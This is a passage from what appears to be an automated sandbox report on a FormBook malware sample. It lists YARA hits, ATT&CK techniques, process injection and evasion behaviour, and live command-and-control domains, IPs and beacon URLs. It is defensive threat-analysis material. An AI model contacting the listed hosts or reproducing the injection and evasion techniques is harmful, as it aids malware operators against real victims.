          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection512Masquerading1Input Capture1Security Software Discovery221Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528622 Sample: S9yf6BkjhTQUbHE.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 34 www.peregorodki.store 2->34 36 www.fullerhomeloans.com 2->36 38 8 other IPs or domains 2->38 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 7 other signatures 2->54 11 S9yf6BkjhTQUbHE.exe 3 2->11         started        signatures3 process4 file5 32 C:\Users\user\...\S9yf6BkjhTQUbHE.exe.log, ASCII 11->32 dropped 68 Tries to detect virtualization through RDTSC time measurements 11->68 15 S9yf6BkjhTQUbHE.exe 11->15         started        signatures6 process7 signatures8 70 Modifies the context of a thread in another process (thread injection) 15->70 72 Maps a DLL or memory area into another process 15->72 74 Sample uses process hollowing technique 15->74 76 Queues an APC in another process (thread injection) 15->76 18 explorer.exe 15->18 injected process9 dnsIp10 40 www.xn----pl8a630b0whm6t.com 23.106.123.249, 80 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG Singapore 18->40 42 www.anamentor.com 172.67.178.31, 49825, 80 CLOUDFLARENETUS United States 18->42 44 4 other IPs or domains 18->44 56 System process connects to network (likely due to code injection or exploit) 18->56 58 Performs DNS queries to domains with low reputation 18->58 22 msdt.exe 12 18->22         started        26 autoconv.exe 18->26         started        signatures11 process12 dnsIp13 46 www.xn----pl8a630b0whm6t.com 22->46 60 Self deletion via cmd delete 22->60 62 Modifies the context of a thread in another process (thread injection) 22->62 64 Maps a DLL or memory area into another process 22->64 66 Tries to detect virtualization through RDTSC time measurements 22->66 28 cmd.exe 1 22->28         started        signatures14 process15 process16 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          S9yf6BkjhTQUbHE.exe22%ReversingLabsWin32.Trojan.AgentTesla

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.xn----pl8a630b0whm6t.com/czh8/?7n=WfBFmY7eHt5QBShHhdd2jwwFQU0Qfs4ciJop7u3ZFFtbwI7iz04mk8i0%Avira URL Cloudsafe
          http://www.anamentor.com/czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG+pwFiMTHdBlEYfNNBf&t4b=Zn-L0%Avira URL Cloudsafe
          www.peptidepowder.com/czh8/0%Avira URL Cloudsafe
          https://www.anamentor.com/czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.xn----pl8a630b0whm6t.com
          23.106.123.249
          truetrue
            unknown
            td-ccm-168-233.wixdns.net
            34.117.168.233
            truetrue
              unknown
              cryptoentering.com
              127.0.0.1
              truetrue
                unknown
                parkingpage.namecheap.com
                198.54.117.218
                truefalse
                  high
                  www.ichelbrousset.com
                  209.17.116.163
                  truefalse
                    unknown
                    www.anamentor.com
                    172.67.178.31
                    truetrue
                      unknown
                      www.fuslonnd.com
                      unknown
                      unknowntrue
                        unknown
                        www.dock-weiler.com
                        unknown
                        unknowntrue
                          unknown
                          www.peregorodki.store
                          unknown
                          unknowntrue
                            unknown
                            www.annellata.xyz
                            unknown
                            unknowntrue
                              unknown
                              www.metricwombat.com
                              unknown
                              unknowntrue
                                unknown
                                www.fullerhomeloans.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.epubgame.net
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.exploitslozdz.xyz
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.cryptoentering.com
                                      unknown
                                      unknowntrue
                                        unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.anamentor.com/czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG+pwFiMTHdBlEYfNNBf&t4b=Zn-Ltrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        www.peptidepowder.com/czh8/true
                                        • Avira URL Cloud: safe
                                        low

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.xn----pl8a630b0whm6t.com/czh8/?7n=WfBFmY7eHt5QBShHhdd2jwwFQU0Qfs4ciJop7u3ZFFtbwI7iz04mk8imsdt.exe, 00000012.00000002.519445044.000000000315F000.00000004.00000020.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameS9yf6BkjhTQUbHE.exe, 00000000.00000002.254291450.000000000304A000.00000004.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmpfalse
                                          high
                                          https://www.anamentor.com/czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYGmsdt.exe, 00000012.00000002.521258705.0000000005332000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          23.106.123.249
                                          www.xn----pl8a630b0whm6t.comSingapore
                                          59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                          172.67.178.31
                                          www.anamentor.comUnited States
                                          13335CLOUDFLARENETUStrue

                                          General Information

                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                          Analysis ID:528622
                                          Start date:25.11.2021
                                          Start time:15:11:30
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 11m 15s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:S9yf6BkjhTQUbHE.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:29
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@8/1@13/2
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 17.5% (good quality ratio 15.5%)
                                          • Quality average: 72.4%
                                          • Quality standard deviation: 32.4%
                                          HCA Information:
                                          • Successful, ratio: 98%
                                          • Number of executed functions: 125
                                          • Number of non-executed functions: 151
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.54.110.249
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/528622/sample/S9yf6BkjhTQUbHE.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          15:12:29API Interceptor22x Sleep call for process: S9yf6BkjhTQUbHE.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          23.106.123.249gJvdHdeawX.exeGet hashmaliciousBrowse
                                            SecuriteInfo.com.Trojan.GenericKDZ.74048.21519.exeGet hashmaliciousBrowse
                                              SecuriteInfo.com.Ransom.Stop.P6.19307.exeGet hashmaliciousBrowse
                                                SecuriteInfo.com.W32.AIDetect.malware1.7393.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.W32.AIDetect.malware1.2200.exeGet hashmaliciousBrowse
                                                    SecuriteInfo.com.W32.AIDetect.malware2.22585.exeGet hashmaliciousBrowse
                                                      ZcCHi8mKVk.exeGet hashmaliciousBrowse
                                                        172.67.178.3140rsuPoRyW.exeGet hashmaliciousBrowse
                                                        • www.anamentor.com/shjn/?sbWx=tv0gbh/Fir1M81j+EOOET4kbqB9H6LwHpkw5oua6kbgwj0sH1g9v33R+7+13J6QYFzuS&e0=s8Vty2Ip
                                                        DHL_DELIVERY_ADDRESS_CONFIRMATION.xlsxGet hashmaliciousBrowse
                                                        • www.anamentor.com/shjn/?lL=tv0gbh/Ais1I8lvyGOOET4kbqB9H6LwHpkop0tG7g7gxjFABywsjhzp84Y5xCLETQValQA==&NRX4i6=BxoHnNf8mX1

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        td-ccm-168-233.wixdns.netORDER K0-9110.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        vbc.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        DHL express 5809439160_pdf.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        Revised Shipping Documents 385099_pdf.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        vGULtWc6Jh.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        rfq.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        DHL50458006SHP.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        New order 7nbm471.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        Swift Copy MT103.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        triage_dropped_file.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        DHL_Delivery_Confirmation.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        Swift Payment Copy.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        SWIFT Transfer 103 000000999315.xlsxGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        Order 0091.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        EwrGOFT5pd.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        UT6Bihk8wY.exeGet hashmaliciousBrowse
                                                        • 34.117.168.233
                                                        parkingpage.namecheap.comJUSTIFICANTE.exeGet hashmaliciousBrowse
                                                        • 198.54.117.216
                                                        Swift Copy TT.docGet hashmaliciousBrowse
                                                        • 198.54.117.212
                                                        8M5ZqXSa28.exeGet hashmaliciousBrowse
                                                        • 198.54.117.218
                                                        XKLyPH8fil.exeGet hashmaliciousBrowse
                                                        • 198.54.117.218
                                                        eFSFIMudyc.exeGet hashmaliciousBrowse
                                                        • 198.54.117.217
                                                        MT103_RECEIPT241121.xlsxGet hashmaliciousBrowse
                                                        • 198.54.117.216
                                                        Quote Request - Linde Tunisia.xlsxGet hashmaliciousBrowse
                                                        • 198.54.117.211
                                                        vbc.exeGet hashmaliciousBrowse
                                                        • 198.54.117.218
                                                        VSL_MV HANNOR.exeGet hashmaliciousBrowse
                                                        • 198.54.117.217
                                                        oIDAuDVIqp.exeGet hashmaliciousBrowse
                                                        • 198.54.117.212
                                                        wYW5AsM930.exeGet hashmaliciousBrowse
                                                        • 198.54.117.216
                                                        DHL express 5809439160_pdf.exeGet hashmaliciousBrowse
                                                        • 198.54.117.217
                                                        HG0uDx2zkt.exeGet hashmaliciousBrowse
                                                        • 198.54.117.211
                                                        NxYNG6zxNe.exeGet hashmaliciousBrowse
                                                        • 198.54.117.212
                                                        97Pl742Uow.exeGet hashmaliciousBrowse
                                                        • 198.54.117.217
                                                        aD1yIqGIQS.exeGet hashmaliciousBrowse
                                                        • 198.54.117.217
                                                        Purchase Order 2890.exeGet hashmaliciousBrowse
                                                        • 198.54.117.218
                                                        50% TT advance copy.docGet hashmaliciousBrowse
                                                        • 198.54.117.215
                                                        Drawing-FS3589_Surra-Unprice BOQ - Lock file - 28.1.2021.xlsx 788K.docGet hashmaliciousBrowse
                                                        • 198.54.117.215
                                                        5F38FE3232085EC3BCF1411036241F6F23E587641B4E9.exeGet hashmaliciousBrowse
                                                        • 198.54.117.212

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGHXSFwEhM8mGet hashmaliciousBrowse
                                                        • 209.58.183.52
                                                        TRANFER SLIP.exeGet hashmaliciousBrowse
                                                        • 209.58.177.241
                                                        t0oNRqzxIc.exeGet hashmaliciousBrowse
                                                        • 198.252.110.227
                                                        Whg8jgqeOs.exeGet hashmaliciousBrowse
                                                        • 198.252.110.227
                                                        q2NdLgh8pk.exeGet hashmaliciousBrowse
                                                        • 198.252.110.227
                                                        SecuriteInfo.com.Variant.Babar.29261.28155.exeGet hashmaliciousBrowse
                                                        • 198.252.110.227
                                                        BrIL7GBTq6.exeGet hashmaliciousBrowse
                                                        • 198.252.110.227
                                                        vd6dk7Pd2i.exeGet hashmaliciousBrowse
                                                        • 198.252.110.227
                                                        Yob73TQCPI.exeGet hashmaliciousBrowse
                                                        • 198.252.110.227
                                                        htP4fuQKSM.exeGet hashmaliciousBrowse
                                                        • 198.252.110.227
                                                        DCF4ECC6D3B70A3E11077862B9E3830806191F0718EEC.exeGet hashmaliciousBrowse
                                                        • 198.252.110.227
                                                        R F Q 2000051165.exeGet hashmaliciousBrowse
                                                        • 209.58.177.241
                                                        R F Q 2000051165.exeGet hashmaliciousBrowse
                                                        • 209.58.177.241
                                                        R F Q 2000051165.exeGet hashmaliciousBrowse
                                                        • 209.58.177.241
                                                        65TYFXU6E9 BANK DATAILS.exeGet hashmaliciousBrowse
                                                        • 209.58.177.241
                                                        TRANSFER SLIP.exeGet hashmaliciousBrowse
                                                        • 209.58.177.241
                                                        TRANSFER SLIP.exeGet hashmaliciousBrowse
                                                        • 209.58.177.241
                                                        TRANSFER SLIP.exeGet hashmaliciousBrowse
                                                        • 209.58.177.241
                                                        TRANSFER SLIP.exeGet hashmaliciousBrowse
                                                        • 209.58.177.241
                                                        JKgYJ56rZsGet hashmaliciousBrowse
                                                        • 172.96.190.95
                                                        CLOUDFLARENETUSHalbank Ekstre 2021101 073653 270424.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        yH8giB6jJ2.exeGet hashmaliciousBrowse
                                                        • 162.159.135.233
                                                        pwY5ozOzpYGet hashmaliciousBrowse
                                                        • 172.64.209.6
                                                        Zr26f1rL6r.exeGet hashmaliciousBrowse
                                                        • 104.21.76.223
                                                        VXsVZBllD099876.exeGet hashmaliciousBrowse
                                                        • 172.67.206.244
                                                        OPKyR75fJn.exeGet hashmaliciousBrowse
                                                        • 104.21.50.241
                                                        COMPROBANTE DE CONSIGNACION #0000012992-882383393293293.vbsGet hashmaliciousBrowse
                                                        • 172.67.68.88
                                                        DOC20212411003001001.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        V-M RTAmpcapital5EG1-TGQO2F-IOC8.htmGet hashmaliciousBrowse
                                                        • 104.16.19.94
                                                        AO7gki3UTr.exeGet hashmaliciousBrowse
                                                        • 162.159.129.233
                                                        6docs'pdf.ppamGet hashmaliciousBrowse
                                                        • 104.16.202.237
                                                        Product Inquiry.exeGet hashmaliciousBrowse
                                                        • 66.235.200.147
                                                        JUSTIFICANTE.exeGet hashmaliciousBrowse
                                                        • 104.21.29.122
                                                        Purchase Order.exeGet hashmaliciousBrowse
                                                        • 162.159.133.233
                                                        Swift Copy TT.docGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        sfhJLQhj84.exeGet hashmaliciousBrowse
                                                        • 104.23.98.190
                                                        TOH09847465353.COM.exeGet hashmaliciousBrowse
                                                        • 104.21.49.41
                                                        ESP095744532.BAT.exeGet hashmaliciousBrowse
                                                        • 104.21.79.226
                                                        New PO.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        lQzTg5PyVw.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\S9yf6BkjhTQUbHE.exe.log
                                                        Process:C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):2239
                                                        Entropy (8bit):5.354287817410997
                                                        Encrypted:false
                                                        SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                                                        MD5:913D1EEA179415C6D08FB255AE42B99D
                                                        SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                                                        SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                                                        SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                                                        Malicious:true
                                                        Reputation:moderate, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                                        Static File Info

                                                        General

